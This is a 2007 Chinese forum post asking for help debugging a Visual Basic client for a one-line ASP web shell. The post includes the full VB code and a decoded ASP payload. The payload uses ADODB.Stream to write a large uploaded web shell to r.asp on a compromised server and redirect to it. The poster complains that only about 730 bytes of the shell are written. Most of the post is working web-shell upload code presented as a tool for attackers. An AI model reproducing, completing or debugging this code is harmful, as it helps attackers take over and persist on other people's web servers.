想用VB写一个一句话的客户端时出了点问题,达人帮忙解决一下

YoungJason 2007-01-27 06:12:48
想用VB写一个一句话的客户端,代码如下
Private Sub Command1_Click()
Dim x As String
Dim myurl As String, send_data As String, my_head As String '声明变量

x = "=+%0D%0Aset+lP%3Dserver.createObject%28%22Adodb.Stream%22%29+%0D%0AlP.Open+%0D%0AlP.Type%3D2+%0D%0AlP.CharSet%3D%22gb2312%22+%0D%0AlP.writetext+request%28%22hackbin%22%29+%0D%0AlP.SaveToFile+server.mappath%28%22" & TXTname & "%22%29%2C2+%0D%0AlP.Close+%0D%0Aset+lP%3Dnothing+%0D%0Aresponse.redirect+%22" & TXTname & "%22+%0D%0A&hackbin=" & Text1.Text



myurl = txturl.Text '地址
send_data = x '还是为变量赋值

my_head = "Content-Type: application/x-www-form-urlencoded" '继续为变量赋值

Inet1.Execute myurl, "POST", txtpass & send_data, my_head '将send_data,my_head的内容用POST的方式发送到myurl去。
Do Until Inet1.StillExecuting = False
DoEvents
Loop


End Sub


txtpass是连接密码,我用HTML版的测试时,抓包,他的数据结构应该是 "密码=变量X&hackbin=大马内容
x的值本来应该是
set lP=server.createObject("Adodb.Stream")
lP.Open
lP.Type=2
lP.CharSet="gb2312"
lP.writetext request("hackbin")
lP.SaveToFile server.mappath("r.asp"),2
lP.Close
set lP=nothing
response.redirect "r.asp"
但是总是不成功,如实我把抓包得到的数据用了上去,估计是要进行什么转换,可能还有换行的原因.....
其中text1.text是写入的大马,但是每次都只有730B左右的信息被发送写入进去(text1.text应该有80K以上)
不知道怎么解决
我有哪里说的不清楚请指正,谢谢!
...全文
334 1 打赏 收藏 转发到动态 举报
写回复
用AI写文章
1 条回复
切换为时间正序
请发表友善的回复…
发表回复
YoungJason 2007-01-27
  • 打赏
  • 举报
回复
好象原因是不能持续发送,只发送一个数据包就终止了,如何能让他保持发送呢?

1,502

社区成员

发帖
与我相关
我的任务
社区描述
VB 网络编程
社区管理员
  • 网络编程
加入社区
  • 近7日
  • 近30日
  • 至今
社区公告
暂无公告

试试用AI创作助手写篇文章吧